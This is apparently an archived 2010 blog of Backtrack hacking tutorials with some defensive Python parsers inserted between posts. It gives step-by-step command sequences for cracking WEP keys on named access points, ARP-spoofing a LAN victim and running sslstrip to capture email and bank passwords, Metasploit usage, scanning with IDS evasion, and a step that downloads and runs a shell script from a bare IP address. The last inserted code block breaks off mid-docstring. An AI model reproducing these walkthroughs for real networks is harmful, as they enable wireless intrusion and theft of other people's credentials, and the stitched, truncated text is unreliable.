Saturday, February 13, 2010

WEP Crack no wireless clients

There are many times when a wireless network has no wireless clients associated with it and there are no ARP requests coming from the wired side. This tutorial describes how to crack the WEP key when there are no wireless clients and there are no ARP requests coming from the wired side.


If there are ARP requests being broadcast from the wired side, then the standard fake authentication combined with the ARP request replay technique may be used.



In this tutorial, here is what was used:
Wireless adaptor Alfa AWUS036H
Backtrack 4



Step 1 - Start the wireless interface in monitor mode on AP channel


 airmon-ng start wlan1 9


Step 2 - Use aireplay-ng to do a fake authentication with the access point


 aireplay-ng -1 0 -e teddy -a 00:14:6C:7E:40:80 -h 00:09:5B:EC:EE:F2 wlan1

-1 means fake authentication
0 reassociation timing in seconds

Or another variation for picky access points:

aireplay-ng -1 6000 -o 1 -q 10 -e teddy -a 00:14:6C:7E:40:80 -h 00:09:5B:EC:EE:F2 wlan1

6000 - Reauthenticate every 6000 seconds. The long period also causes keep-alive packets to be sent.
-o 1 - Send only one set of packets at a time. The default is multiple, and this confuses some APs.
-q 10 - Send keep-alive packets every 10 seconds.


Troubleshooting Tips
Some access points are configured to only allow selected MAC addresses to associate and connect. If this is the case, you will not be able to successfully do fake authentication unless you know one of the MAC addresses on the allowed list.

If at any time you wish to confirm you are properly associated, use tcpdump and look at the packets. Start another session and run:

tcpdump -n -e -s0 -vvv -i wlan1

Here is a typical tcpdump error message you are looking for:

11:04:34.360700 314us BSSID:00:14:6c:7e:40:80 DA:00:09:5B:EC:EE:F2 SA:00:14:6c:7e:40:80   DeAuthentication: Class 3 frame received from nonassociated station

Notice that the access point (00:14:6c:7e:40:80) is telling the source (00:09:5B:EC:EE:F2) you are not associated. Meaning, the AP will not process or accept the injected packets.

If you want to select only the DeAuth packets with tcpdump then you can use: "tcpdump -n -e -s0 -vvv -i wlan1 | grep -i DeAuth". You may need to tweak the phrase "DeAuth" to pick out the exact packets you want.


Step 3 - Use the aireplay-ng chopchop or fragmentation attack to obtain PRGA

The objective of the chopchop and fragmentation attacks is to obtain a PRGA (pseudo random generation algorithm) file. This PRGA is not the WEP key and cannot be used to decrypt packets. However, it can be used to create new packets for injection. The creation of new packets will be covered later in the tutorial.

Either the chopchop or the fragmentation attack can be used to obtain the PRGA bit file. The result is the same, so use whichever one works for you.

We will cover the fragmentation technique first. Start another console session and run:

aireplay-ng -5 -b 00:14:6C:7E:40:80 -h 00:09:5B:EC:EE:F2 wlan1
-5 means the fragmentation attack

Success! The file "fragment-0203-180343.xor" can then be used in the next step to generate an arp packet.

If the fragmentation attack was not successful, you can then try the chopchop technique next. Run:

aireplay-ng -4 -h 00:09:5B:EC:EE:F2 -b 00:14:6C:7E:40:80 wlan1
-4 means the chopchop attack

Success! The file "replay_dec-0201-191706.xor" above can then be used in the next step to generate an arp packet.

Helpful Tips
Be sure the packet is 68 or more bytes; otherwise you may not have enough PRGA data to subsequently generate a packet. The PRGA captured has to be equal to or greater than the length of the packet we want to generate.

At home, to generate some packets to force chopchop to start, ping a nonexistent IP on your network using a wired client. This forces an arp to be broadcast, and it will show up in chopchop to be used.


Step 4 - Use packetforge-ng to create an arp packet

In the previous step, we obtained PRGA. It does not matter which attack generated the PRGA, both are equal. This PRGA is stored in the files ending with "xor". We can then use this PRGA to generate a packet for injection. We will be generating an arp packet for injection. The objective is to have the access point rebroadcast the injected arp packet. When it rebroadcasts it, a new IV is obtained. All these new IVs will ultimately be used to crack the WEP key.

But first, let's generate the arp packet for injection by entering:

packetforge-ng -0 -a 00:14:6C:7E:40:80 -h 00:09:5B:EC:EE:F2 -k 255.255.255.255 -l 255.255.255.255 -y fragment-0203-180343.xor -w arp-request

-0 means generate an arp packet
-k 255.255.255.255 is the destination IP (most APs respond to 255.255.255.255)
-l 255.255.255.255 is the source IP (most APs respond to 255.255.255.255)
-y fragment-0203-180343.xor is the file to read the PRGA from
-w arp-request is the name of the file to write the arp packet to

The system will respond:

Wrote packet to: arp-request


Step 5 - Start airodump-ng

Open another console session to capture the generated IVs. Then enter:

airodump-ng -c 9 --bssid 00:14:6C:7E:40:80 -w capture wlan1
-c 9 is the channel for the wireless network


Step 6 - Inject the arp packet
Using the console session where you generated the arp packet, enter:

aireplay-ng -2 -r arp-request wlan1
-2 means use interactive frame selection
-r arp-request defines the file name from which to read the arp packet


Step 7 - Run aircrack-ng to obtain the WEP key

Start another console session and enter:

aircrack-ng -b 00:14:6C:7E:40:80 capture*.cap
capture*.cap selects all dump files starting with "capture" and ending in "cap".
-b 00:14:6C:7E:40:80 selects the one access point we are interested in

You can run this while generating packets. In a short time, the WEP key will be calculated and presented. Using the PTW method, 40-bit WEP can be cracked with as few as 20,000 data packets and 104-bit WEP with 40,000 data packets. As a reminder, the requirement is that you capture the full packet with airodump-ng. Meaning, do not use the "--ivs" option.

Friday, February 12, 2010

Simple WEP Crack



Overview

To crack the WEP key for an access point, we need to gather lots of initialization vectors (IVs). Normal network traffic does not typically generate these IVs very quickly. Theoretically, if you are patient, you can gather sufficient IVs to crack the WEP key by simply listening to the network traffic and saving them. Since none of us are patient, we use a technique called injection to speed up the process. Injection involves having the access point (AP) resend selected packets over and over very rapidly. This allows us to capture a large number of IVs in a short period of time.

Equipment used
WiFi adaptor: Alfa AWUS036H (available on eBay)
Software: Backtrack 4 (free download from backtrack-linux.org)

Step 1 - Start the wireless interface in monitor mode on AP channel

airmon-ng start wlan1 6
starts the wifi interface on channel 6


Step 2 - Test Wireless Device Packet Injection

aireplay-ng -9 -e infosec -a 00:1B:11:24:27:2E wlan1

-9 means injection test
-a 00:1B:11:24:27:2E is the access point MAC address


Step 3 - Start airodump-ng to capture the IVs

airodump-ng -c 6 --bssid 00:1B:11:24:27:2E -w output wlan1

Step 4 - Use aireplay-ng to do a fake authentication with the access point
In order for an access point to accept a packet, the source MAC address must already be associated. If the source MAC address you are injecting is not associated then the AP ignores the packet and sends out a "DeAuthentication" packet in cleartext. In this state, no new IVs are created because the AP is ignoring all the injected packets.


aireplay-ng -1 0 -e infosec -a 00:1B:11:24:27:2E -h 00:c0:ca:27:e5:6a wlan1

-1 means fake authentication
0 reassociation timing in seconds
-e infosec is the wireless network name
-a 00:1B:11:24:27:2E is the access point MAC address
-h 00:c0:ca:27:e5:6a is our card MAC address


OR

aireplay-ng -1 2 -o 1 -q 10 -e infosec -a 00:1B:11:24:27:2E -h 00:c0:ca:27:e5:6a wlan1

2 - Reauthenticate every 2 seconds.
-o 1 - Send only one set of packets at a time. The default is multiple, and this confuses some APs.
-q 10 - Send keep alive packets every 10 seconds.




Troubleshooting Tips

Some access points are configured to only allow selected MAC addresses to associate and connect. If this is the case, you will not be able to successfully do fake authentication unless you know one of the MAC addresses on the allowed list. If you suspect this is the problem, use the following command while trying to do fake authentication. Start another session and run:

tcpdump -n -vvv -s0 -e -i wlan1 | grep -i -E "(RA:|Authentication|ssoc)"

You would then look for error messages.

If at any time you wish to confirm you are properly associated, use tcpdump and look at the packets. Start another session and run:

tcpdump -n -e -s0 -vvv -i wlan1

Here is a typical tcpdump error message you are looking for:

11:04:34.360700 314us BSSID:00:14:6c:7e:40:80 DA:00:0F:B5:88:AC:82 SA:00:14:6c:7e:40:80   DeAuthentication: Class 3 frame received from nonassociated station

Notice that the access point (00:14:6c:7e:40:80) is telling the source (00:0F:B5:88:AC:82) you are not associated. Meaning, the AP will not process or accept the injected packets.

If you want to select only the DeAuth packets with tcpdump then you can use: "tcpdump -n -e -s0 -vvv -i wlan1 | grep -i DeAuth". You may need to tweak the phrase "DeAuth" to pick out the exact packets you want.
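The association check in both WEP posts greps tcpdump output for "DeAuthentication: Class 3 frame received from nonassociated station". As an added example (my code, not the posts'), the parser below reads lines in that tcpdump format, implements the same check as a function, and turns the same signal into a monitoring heuristic: an AP that keeps rejecting frames from a station that never associated is seeing frames injected without an association. The sample log is constructed from the post's example line.

```python
import re
from collections import Counter

# Constructed sample of "tcpdump -n -e -s0 -vvv -i wlan1" output on a monitor-mode
# interface. The first line copies the post's example; the others are made up here
# (reusing the post's example MACs) to exercise the detector.
SAMPLE_LOG = """\
11:04:34.360700 314us BSSID:00:14:6c:7e:40:80 DA:00:09:5B:EC:EE:F2 SA:00:14:6c:7e:40:80   DeAuthentication: Class 3 frame received from nonassociated station
11:04:34.361200 314us BSSID:00:14:6c:7e:40:80 DA:00:09:5B:EC:EE:F2 SA:00:14:6c:7e:40:80   DeAuthentication: Class 3 frame received from nonassociated station
11:04:34.362100 314us BSSID:00:14:6c:7e:40:80 DA:00:09:5B:EC:EE:F2 SA:00:14:6c:7e:40:80   DeAuthentication: Class 3 frame received from nonassociated station
11:04:35.100000 314us BSSID:00:14:6c:7e:40:80 DA:ff:ff:ff:ff:ff:ff SA:00:14:6c:7e:40:80   Beacon (teddy) [1.0* 2.0* 5.5* 11.0* Mbit] ESS CH: 9, PRIVACY
11:04:36.000100 314us BSSID:00:14:6c:7e:40:80 DA:00:0f:b5:88:ac:82 SA:00:14:6c:7e:40:80   DeAuthentication: Class 3 frame received from nonassociated station
this line is not an 802.11 frame and is skipped
"""

# timestamp, optional duration field, then the three addresses tcpdump -e prints
FRAME_RE = re.compile(
    r"^(?P<ts>\d{2}:\d{2}:\d{2}\.\d+)\s+"
    r"(?:\d+us\s+)?"
    r"BSSID:(?P<bssid>[0-9A-Fa-f:]{17})\s+"
    r"DA:(?P<da>[0-9A-Fa-f:]{17})\s+"
    r"SA:(?P<sa>[0-9A-Fa-f:]{17})\s+"
    r"(?P<body>.+)$"
)
NONASSOC_DEAUTH = "Class 3 frame received from nonassociated station"


def parse_frame(line):
    """Return a dict for one tcpdump 802.11 line, or None if it is not a frame line."""
    m = FRAME_RE.match(line.strip())
    if not m:
        return None
    frame = m.groupdict()
    for key in ("bssid", "da", "sa"):
        frame[key] = frame[key].lower()  # tcpdump prints MACs in mixed case
    return frame


def nonassociated_deauths(log_text):
    """Deauth frames in which the AP (SA == BSSID) rejects a station that never associated."""
    frames = (parse_frame(line) for line in log_text.splitlines())
    return [f for f in frames
            if f and NONASSOC_DEAUTH in f["body"] and f["sa"] == f["bssid"]]


def station_is_accepted(log_text, station_mac):
    """The post's check: the station is not associated if the AP keeps deauthenticating it."""
    station_mac = station_mac.lower()
    return not any(f["da"] == station_mac for f in nonassociated_deauths(log_text))


def count_deauths_by_station(log_text):
    """Counter keyed by (bssid, station) of nonassociated-station deauths."""
    return Counter((f["bssid"], f["da"]) for f in nonassociated_deauths(log_text))


def flag_unassociated_senders(log_text, threshold=3):
    """Monitoring heuristic: a station the AP rejects repeatedly is sending data
    frames without an association. Returns sorted (bssid, station, count) tuples
    for every pair at or above the threshold."""
    return sorted(
        (bssid, da, n)
        for (bssid, da), n in count_deauths_by_station(log_text).items()
        if n >= threshold
    )


if __name__ == "__main__":
    for bssid, station, n in flag_unassociated_senders(SAMPLE_LOG):
        print(f"AP {bssid} rejected {n} frames from unassociated station {station}")
```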


Step 5 - Start aireplay-ng in ARP request replay mode

aireplay-ng -3 -b 00:1B:11:24:27:2E -h 00:c0:ca:27:e5:6a wlan1


Step 6 - Run aircrack-ng to obtain the WEP key

 aircrack-ng -b 00:1B:11:24:27:2E output*.cap



Wednesday, February 10, 2010

Client side attacks

A client side attack involves exploiting a weakness in client software, such as a browser, in order to gain access to a machine.

The victim computer does not have to be routable or directly accessible to the attacker. As long as the victim is able to browse to the attacker's site, the attack can occur.

Scenario

Victim == Firewall == INTERNET == Attacker

1. The victim browses the attacker's site.
2. Malicious html exploits a browser vulnerability, and executes shellcode.
3. Shellcode is a reverse shell over port 443 to attackers machine.

Client side attacks can come in other forms, such as Microsoft doc, ppt and xls files which may exploit a vulnerability in MS Office. Perhaps one of the nastiest client side bugs was the Microsoft GDI heap overflow, which could be triggered by a JPG image file. Sending the vulnerable victim a seemingly benign JPG would result in code execution on their machine just by viewing (or previewing) the file.

Install jDownloader

Before starting, be sure you have installed Sun's Java. You can install it via:

$ sudo apt-get install sun-java6-bin sun-java6-jre sun-java6-jdk sun-java6-plugin

You can change your default Java via:

$ sudo update-java-alternatives -s java-6-sun

OK, now let's download jDownloader via:

$ wget -c http://212.117.163.148/jd.sh

After the download, make it executable and run it:

$ chmod +x jd.sh
$ ./jd.sh

 

Monday, February 8, 2010

metasploit basics

msfconsole


The msfconsole is probably the most popular interface to the MSF. It provides an all-in-one centralized console and allows you efficient access to virtually all of the options available in the Metasploit Framework.

Getting Help

Entering 'help' or a '?' at the msf command prompt will display a listing of available commands along with a description of what they are used for.

msf > help

Tab completion

One of the more useful features of msfconsole is tab completion. As with most other shells, entering what you know and pressing "Tab" will present you with list of options available to you or auto-complete the string if there is only one option.

Show command

Entering 'show' at the msfconsole prompt will display every module within Metasploit.

There are a number of 'show' commands you can use, but the ones you will use most frequently are 'show auxiliary', 'show exploits', and 'show payloads'.

Executing 'show auxiliary' will display a listing of all the available auxiliary modules within Metasploit. Auxiliary modules include scanners, denial of service modules, fuzzers, and more.

msf > show auxiliary

'show exploits' will give a listing of all exploits contained in the framework.

msf > show exploits

'show payloads' will display all of the different payloads for all platforms available within Metasploit.

msf > show payloads

There are a lot of payloads available. Fortunately, when you are in the context of a particular exploit, running 'show payloads' will only display the payloads that are compatible with that particular exploit. For instance, if it is a Windows exploit, you will not be shown the Linux payloads.

msf exploit(ms08_067_netapi) > show payloads

If you have selected a specific module, you can issue the 'show options' command to display which settings are available and/or required for that specific module.

msf exploit(ms08_067_netapi) > show options

If you aren't certain whether an operating system is vulnerable to a particular exploit, run the 'show targets' command from within the context of an exploit module to see which targets are supported.

msf exploit(ms08_067_netapi) > show targets

If you wish to further fine-tune an exploit, you can see more advanced options by running 'show advanced'

msf exploit(ms08_067_netapi) > show advanced


"search" Command

If you have a general idea of what you are looking for, you can search for it via 'search <term>'. In the example below, a search is being made for MS Bulletin MS09-001. The search function will locate this string within the module references.

msf > search ms09-001

"info" Command

The 'info' command will provide detailed information about a particular module including all options, targets, and other information.

msf > info dos/windows/smb/ms09_001_write

"use" Command

When you have decided on a particular module to make use of, issue the 'use' command to select it.

msf > use dos/windows/smb/ms09_001_write

msf auxiliary(ms09_001_write) > show options

"connect" Command

By issuing the 'connect' command with an IP address and port number, you can connect to a remote host from within msfconsole the same as you would with netcat or telnet.

msf > connect 192.168.1.1 23

"set" Command

The 'set' command is used to configure the options and settings of the module you are currently working with.

msf auxiliary(ms09_001_write) > set RHOST 192.168.1.1
RHOST => 192.168.1.1
msf auxiliary(ms09_001_write) > show options

A recently added feature in Metasploit is the ability to set an encoder to use at run-time. This is particularly useful in exploit development when you aren't quite certain as to which payload encoding methods will work with an exploit.

msf exploit(ms08_067_netapi) > show encoders
msf exploit(ms08_067_netapi) > set encoder x86/shikata_ga_nai
encoder => x86/shikata_ga_nai

"check" command

There aren't many exploits that support it, but there is also a 'check' option that will check to see if a target is vulnerable to a particular exploit instead of actually exploiting it.

msf exploit(ms04_045_wins) > show options
msf exploit(ms04_045_wins) > check
Check failed: The connection was refused by the remote host (192.168.1.114:42)

Setting Global Variables

In order to save a lot of typing during a pentest, you can set global variables within msfconsole. You can do this with the 'setg' command. Once these have been set, you can use them in as many exploits and auxiliary modules as you like. You can also save them for use the next time you start msfconsole. However, the pitfall is forgetting you have saved globals, so always check your options before you 'run' or 'exploit'. Conversely, you can use the 'unsetg' command to unset a global variable. In the examples that follow, variables are entered in all caps (i.e. LHOST), but Metasploit is case-insensitive, so it is not necessary to do so.

msf > setg LHOST 192.168.1.101
msf > setg RHOSTS 192.168.1.0/24
msf > setg RHOST 192.168.1.136
msf > save

"exploit/run" Commands

When launching an exploit, you issue the 'exploit' command whereas if you are using an auxiliary module, the proper usage is 'run' although 'exploit' will work as well.

msf auxiliary(ms09_001_write) > run

"back" Command

Once you have finished working with a particular module, or if you inadvertently select the wrong module, you can issue the 'back' command to move out of the current context. This, however, is not required. Just as you can in commercial routers, you can switch modules from within other modules. As a reminder, variables will only carry over if they are set globally.

msf auxiliary(ms09_001_write) > back

How to decrypt https passwords

Description

This tutorial shows how to hack or decrypt SSL (https) passwords. Email accounts, bank accounts and other secure sites use SSL for encryption.
For example, when I log in to my Gmail account, the Explorer address bar shows
https://mail.google.com/mail/?shva=1#

If you type paypal.com, it automatically redirects to https://www.paypal.com/mv
For any site which uses https, we can decrypt the password using sslstrip.

Before starting the attack.. follow the 2 steps below

1. Download BackTrack, burn it to a DVD, boot from the DVD, and set the IP address.

2. The attacking PC and the victim PC need to be in the same network/LAN. If the victim PC is in the 192.168.1.0 range,
then the attacking PC also needs to be in the 192.168.1.0 range.

Steps to hack an email password using the sslstrip program


Basically this attack consists of 4 steps.

Step 1. Set the attacker machine in IP forwarding mode, so that it can forward all the victim's packets to the right address.
#echo 1 > /proc/sys/net/ipv4/ip_forward

Step 2. Start the ARP spoof attack between the victim machine and the gateway: we spoof the ARP replies, telling the victim machine that the MAC address of the gateway is the attacker's MAC.
#arpspoof -i eth0 -t 192.168.50.5 192.168.50.1
-t is the target (victim IP, 192.168.50.5)
192.168.50.1 is the gateway which you want to spoof

To check if the ARP spoof is running successfully, ping the gateway (192.168.50.1) from the client machine
and then use the command arp -a.
You should see that the attacker's and the gateway's MAC addresses are the same.

In the image you can see the gateway and the attacker PC having the same MAC address, 00-16-44-45-7e-c2, which means the ARP spoof attack is working.

Step 3. Set up an iptables rule which will redirect all HTTP traffic from the victim PC to port 10000, where sslstrip is listening.
Open a new console, and type the following command.
#iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000


Step 4. Run sslstrip
#sslstrip -w secret

secret is the file name I want to save the results to as a log file.
From the victim PC, open and log in to email.
Now use the less secret command to read the log file
and search for the email address and password.

If the log file is too long and you want to search for a particular user id, use the following commands (the second is typed inside less):
#less secret
/infosec.tutorials

infosec.tutorials@gmail.com is the email address I used.

Below is an image of the Gmail account infosec.tutorials@gmail.com; I have removed the password field.
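The duplicate-MAC check in step 2 (ping the gateway, then arp -a) is the same check a defender runs to spot ARP spoofing on a LAN. As an added example that is not part of the post, the Python below parses arp -a output in both the Windows format shown in the screenshot and the Linux format, lists MACs claimed by more than one IP, and also compares the gateway's current MAC against a known-good value, which catches the case where the poisoning host's own IP is not in the cache. Both sample caches are constructed.

```python
import re

# Constructed sample of "arp -a" on a Windows victim, in the layout the post's
# screenshot shows, with the post's MAC 00-16-44-45-7e-c2. 192.168.50.1 is the
# gateway; the second entry sharing its MAC stands for the spoofing host.
WINDOWS_ARP = """\
Interface: 192.168.50.5 --- 0xb
  Internet Address      Physical Address      Type
  192.168.50.1          00-16-44-45-7e-c2     dynamic
  192.168.50.7          00-16-44-45-7e-c2     dynamic
  192.168.50.255        ff-ff-ff-ff-ff-ff     static
  224.0.0.22            01-00-5e-00-00-16     static
"""

# Constructed sample of the same situation as "arp -a" prints it on Linux.
LINUX_ARP = """\
gateway (192.168.50.1) at 00:16:44:45:7e:c2 [ether] on eth0
? (192.168.50.7) at 00:16:44:45:7e:c2 [ether] on eth0
? (192.168.50.9) at 00:1b:11:24:27:2e [ether] on eth0
"""

# An IPv4 address followed (after non-digit filler) by a MAC in either separator style.
ENTRY_RE = re.compile(
    r"(?P<ip>\d{1,3}(?:\.\d{1,3}){3})\D+?"
    r"(?P<mac>(?:[0-9A-Fa-f]{2}[:-]){5}[0-9A-Fa-f]{2})"
)


def normalize_mac(mac):
    """Canonical lower-case, colon-separated form so both OS formats compare equal."""
    return mac.replace("-", ":").lower()


def is_unicast(mac):
    """Broadcast and multicast MACs (low bit of first octet set) never indicate a host."""
    return int(mac.split(":")[0], 16) & 1 == 0


def parse_arp_table(text):
    """Map IP -> MAC for the unicast entries of arp -a output (Windows or Linux)."""
    table = {}
    for m in ENTRY_RE.finditer(text):
        mac = normalize_mac(m.group("mac"))
        if is_unicast(mac):
            table[m.group("ip")] = mac
    return table


def find_shared_macs(table):
    """MACs claimed by more than one IP, the sign the post tells you to look for."""
    by_mac = {}
    for ip, mac in table.items():
        by_mac.setdefault(mac, []).append(ip)
    return {mac: sorted(ips) for mac, ips in by_mac.items() if len(ips) > 1}


def gateway_impersonators(table, gateway_ip):
    """Other IPs that currently resolve to the gateway's MAC (empty list if none)."""
    gw_mac = table.get(gateway_ip)
    if gw_mac is None:
        return []
    return sorted(ip for ip, mac in table.items() if mac == gw_mac and ip != gateway_ip)


def gateway_mac_changed(table, gateway_ip, expected_mac):
    """Compare against a known-good gateway MAC; this still fires when the spoofing
    host's own IP is absent from the cache. False if the gateway is not cached."""
    current = table.get(gateway_ip)
    if current is None:
        return False
    return current != normalize_mac(expected_mac)


if __name__ == "__main__":
    cache = parse_arp_table(WINDOWS_ARP)
    for mac, ips in find_shared_macs(cache).items():
        print(f"{mac} is claimed by {', '.join(ips)}")
```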

Sunday, February 7, 2010

Exploitdb navigation

Updating:

This can be done either in the menu -> Backtrack -> Penetration -> ExploitDB -> Update Exploitdb

Looking for ms08-067
root@bt:/pentest/exploits/exploitdb# ./searchsploit ms08-067

Looking for Apache exploits on Windows platform:

root@bt:/pentest/exploits/exploitdb# ./searchsploit apache windows


Looking for an Adobe 9.1.2 exploit, copying it to our root directory and renaming it to adobe:

root@bt:/pentest/exploits/exploitdb# ./searchsploit adobe 9.1.2

nmap commands

1. Nmap a range of IP addresses:
nmap 192.168.0.1-10

2. Nmap Range of ports:
nmap -p 1-1024 192.168.1.1

3. Nmap service version detection:
nmap -sV 192.168.1.1

4. Nmap OS version detection:
nmap -A 192.168.1.1

5. Nmap external script checks
nmap -sC 192.168.1.1

6. Nmap scan without ping check (sometimes ping is blocked but you still want to scan)
nmap -PN 192.168.1.1

7. Nmap scan only scanning known ports (fast scan)
nmap -F 192.168.1.1 

nmap -T Aggressive -sV -O -v 192.168.1.1
nmap -T Aggressive -sV -P0 192.168.1.1

 

Accessing an SMB Share With Linux Machines

To see which shares are available on a given host, run:
/usr/bin/smbclient -L host

where 'host' is the name of the machine that you wish to view.

The browse list shows other SMB servers with resources to share on the network.
To use the client, run:
/usr/bin/smbclient service

where 'service' is a machine and share name. For example, if you are trying to reach a directory that has been shared as 'public' on a machine called zimmerman, the service would be called \\zimmerman\public. However, due to shell restrictions, you will need to escape the backslashes, so you end up with something like this:

/usr/bin/smbclient \\\\zimmerman\\public mypasswd

where 'mypasswd' is the literal string of your password.

You will get the smbclient prompt:

Server time is Sat Aug 10 15:58:44 1996

Timezone is UTC+10.0
Domain=[WORKGROUP] OS=[Windows NT 3.51] Server=[NT LAN Manager 3.51]
smb: \>

Type 'h' to get help using smbclient:
smb: \> h

Install Nessus to Back Track

Download Nessus and follow the steps to install it on BackTrack.

1. Install the package using the following command
dpkg -i Nessus-4.2.0-ubuntu810_i386.deb

2. Add a user to Nessus
/opt/nessus/sbin/nessus-adduser

3. Register on the Nessus website, obtain an activation key, and activate your installation

4. Start the Nessus server
/etc/init.d/nessusd start

5. Start the client web interface
https://127.0.0.1:8834/

Nikto Web Scanning

== Basic scanning ==
The most basic Nikto scan simply requires a host to target, since port 80 is assumed if none is specified. The host can be either an IP or a host name of a machine, and is specified using the -h (-host) option. The following will scan the IP 192.168.0.1 on TCP port 80

perl nikto.pl -h 192.168.0.1

To check on a different port, specify the port number with the -p (-port) option

perl nikto.pl -h 192.168.0.1 -p 443

Host, ports, and protocols may also be specified by using a full URL syntax

perl nikto.pl -h https://192.168.0.1:443/

== Multiple Port Testing ==
Nikto can scan multiple ports in the same scanning session. To test more than one port on the same host, specify the list of ports in the -p option. Ports can be specified as a range (i.e., 80-90), or as a comma-delimited list (i.e., 80,88,90)

perl nikto.pl -h 192.168.0.1 -p 80,88,443

== Multiple Host Testing ==
Nikto supports scanning multiple hosts in the same session via a text file of host names or IPs. Instead of giving a host name or IP for the -h (-host) option, a file name can be given. A file of hosts must be formatted as one host per line, with the port number(s) at the end of each line. Ports can be separated from the host and other ports via a colon or a comma. If no ports are specified, port 80 will be assumed.

Example of a valid hosts file:
192.168.1.1:80
https://192.168.2.2:8080
192.168.2.2

perl nikto.pl -h 192.168.1.1 -e 1 -Display V

A hosts file may also be nmap output in "greppable" format (i.e., the output from -oG).

A file may be passed to Nikto through stdout/stdin using "-" as the filename. For example:

nmap -p80 192.168.1.1/24 -oG - | perl nikto.pl -h -

== Using a Proxy ==
If the machine running Nikto only has access to the target host (or update server) via an HTTP proxy, the test can still be performed. Set the proxy variable in the configuration file, then execute Nikto with the -u (-useproxy) option. All connections will be relayed through the HTTP proxy specified in the configuration file.

perl nikto.pl -h 192.168.1.1 -p 80 -u

== Updating ==
Nikto can be automatically updated, assuming you have internet connectivity from the host Nikto is installed on. To update to the latest plugins and databases, simply run Nikto with the -update option.

perl nikto.pl -update

== All Options ==

Below are all the nikto command line options and explanations.

-Cgidirs
Scan these CGI directories. Special words "none" or "all" may be used to scan all CGI directories or none, (respectively). A literal value for a CGI directory such as "/cgi-test" may be specified (must include trailing slash). If this option is not specified, all CGI directories listed in config.txt will be tested

-config
Specify an alternative config file to use instead of the config.txt located in the install directory.

-dbcheck
Check the scan database for syntax errors

-Display
Control the output that Nikto shows. Use the reference number or letter to specify the type; multiple may be used

1. Show redirects
2. Show cookies received
3. Show all 200/OK responses
4. Show URLs which require authentication
D. Debug output
V. Verbose Output

-evasion
Specify the LibWhisker IDS evasion technique to use. Use the reference number to specify the type, multiple may be used

1. Random URI encoding (non-UTF8)
2. Directory self-reference (/./)
3. Premature URL ending
4. Prepend long random string
5. Fake parameter
6. TAB as request spacer
7. Change the case of the URL
8. Use Windows directory separator (\)


perl nikto.pl -h 192.168.5.103 -evasion 1


-findonly
Only discover the HTTP(S) ports; do not perform a security scan. This will attempt to connect with HTTP or HTTPS, and report the server header.

-Format
Save the output file specified with the -o (-output) option in this format. If not specified, the default is "txt". Valid formats are
csv - a comma-separated list
htm - an HTML report
txt - a text report
xml - an XML report

-host
Host(s) to target. Can be an IP address, hostname or text file of hosts.



-id

ID and password to use for host Basic host authentication. Format is "id:password".


-mutate

Specify mutation technique. A mutation will cause Nikto to combine tests or attempt to guess values. These techniques may cause a tremendous amount of tests to be launched against the target. Use the reference number to specify the type, multiple may be used:
1 - Test all files with all root directories
2 - Guess for password file names
3 - Enumerate user names via Apache (/~user type requests)
4 - Enumerate user names via cgiwrap (/cgi-bin/cgiwrap/~user type requests)
5 - Attempt to brute force sub-domain names, assume that the host name is the parent domain
6 - Attempt to guess directory names from the supplied dictionary file


-mutate-options

Provide extra information for mutates, e.g. a dictionary file

-nolookup
Do not perform name lookups on IP addresses.

-nossl
Do not use SSL to connect to the server.

-no404
Disable 404 (file not found) checking. This will reduce the total number of requests made to the webserver and may be preferable when checking a server over a slow link, or an embedded device. This will generally lead to more false positives being discovered.

-output
Write output to the file specified. Format is defined in -F (-Format), default is text. Existing files will have new information appended.

-port
TCP port(s) to target. To test more than one port on the same host, specify the list of ports in the -p (-port) option. Ports can be specified as a range (i.e., 80-90), or as a comma-delimited list, (i.e., 80,88,90). If not specified, port 80 is used.

-Pause
Seconds to delay between each test.

-root
Prepend the value specified to the beginning of every request. This is useful to test applications or web servers which have all of their files under a certain directory.

-ssl
Only test SSL on the ports specified. Using this option will dramatically speed up requests to HTTPS ports, since otherwise the HTTP request will have to timeout first.

-Single
Perform a single request to a target server. Nikto will prompt for all options which can be specified, and then report the detailed output. See Chapter 5 of the Nikto documentation for detailed information.

-timeout
Seconds to wait before timing out a request. Default timeout is 10 seconds.

-useproxy

Use the HTTP proxy defined in the configuration file.

-update
Update the plugins and databases directly from cirt.net.

-Version
Display the Nikto software, plugin and database versions.

-vhost
Specify the Host header to be sent to the target


-Tuning
Tuning options will control the test that Nikto will use against a target. By default, if any options are specified, only those tests will be performed. If the "x" option is used, it will reverse the logic and exclude only those tests. Use the reference number or letter to specify the type, multiple may be used:
0 - File Upload
1 - Interesting File / Seen in logs
2 - Misconfiguration / Default File
3 - Information Disclosure
4 - Injection (XSS/Script/HTML)
5 - Remote File Retrieval - Inside Web Root
6 - Denial of Service
7 - Remote File Retrieval - Server Wide
8 - Command Execution / Remote Shell
9 - SQL Injection
a - Authentication Bypass
b - Software Identification
c - Remote Source Inclusion
x - Reverse Tuning Options (i.e., include all except specified)
The given string will be parsed from left to right, any x characters will apply to all characters to the right of the character.

perl nikto.pl -h 192.168.1.1 -T 58

If an 'x' is passed to -T then this will negate all tests of types following the x. This is useful where a test may check several different types of exploits. For example


perl nikto.pl -h 192.168.1.1 -T 58xb
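To make the left-to-right parsing rule concrete, here is an added example (my code, not Nikto's own) that resolves a -Tuning string into selected and excluded test types and answers whether a test tagged with several types, such as 5 and b, would run under "58xb". The handling of an x with no explicit inclusions ("x6" meaning everything except 6) follows the description of the x option above; the type table is the one listed in the post.

```python
# Nikto -Tuning reference table as listed above.
TUNING_TYPES = {
    "0": "File Upload",
    "1": "Interesting File / Seen in logs",
    "2": "Misconfiguration / Default File",
    "3": "Information Disclosure",
    "4": "Injection (XSS/Script/HTML)",
    "5": "Remote File Retrieval - Inside Web Root",
    "6": "Denial of Service",
    "7": "Remote File Retrieval - Server Wide",
    "8": "Command Execution / Remote Shell",
    "9": "SQL Injection",
    "a": "Authentication Bypass",
    "b": "Software Identification",
    "c": "Remote Source Inclusion",
}


def parse_tuning(spec):
    """Split a -Tuning string into (selected, excluded) sets of type characters.

    Characters are read left to right; an 'x' flips every character to its right
    into the excluded set. With no explicit inclusions the base set is every type,
    so "x6" means "all tests except 6" and "" means all tests.
    """
    included, excluded = set(), set()
    negate = False
    for ch in spec.strip():
        if ch == "x":
            negate = True
            continue
        if ch not in TUNING_TYPES:
            raise ValueError(f"unknown tuning type {ch!r}")
        (excluded if negate else included).add(ch)
    base = included if included else set(TUNING_TYPES)
    return base - excluded, excluded


def would_run(spec, test_types):
    """Would a test tagged with these type characters run under this -Tuning string?

    A test can carry several types; one excluded type is enough to drop it, which
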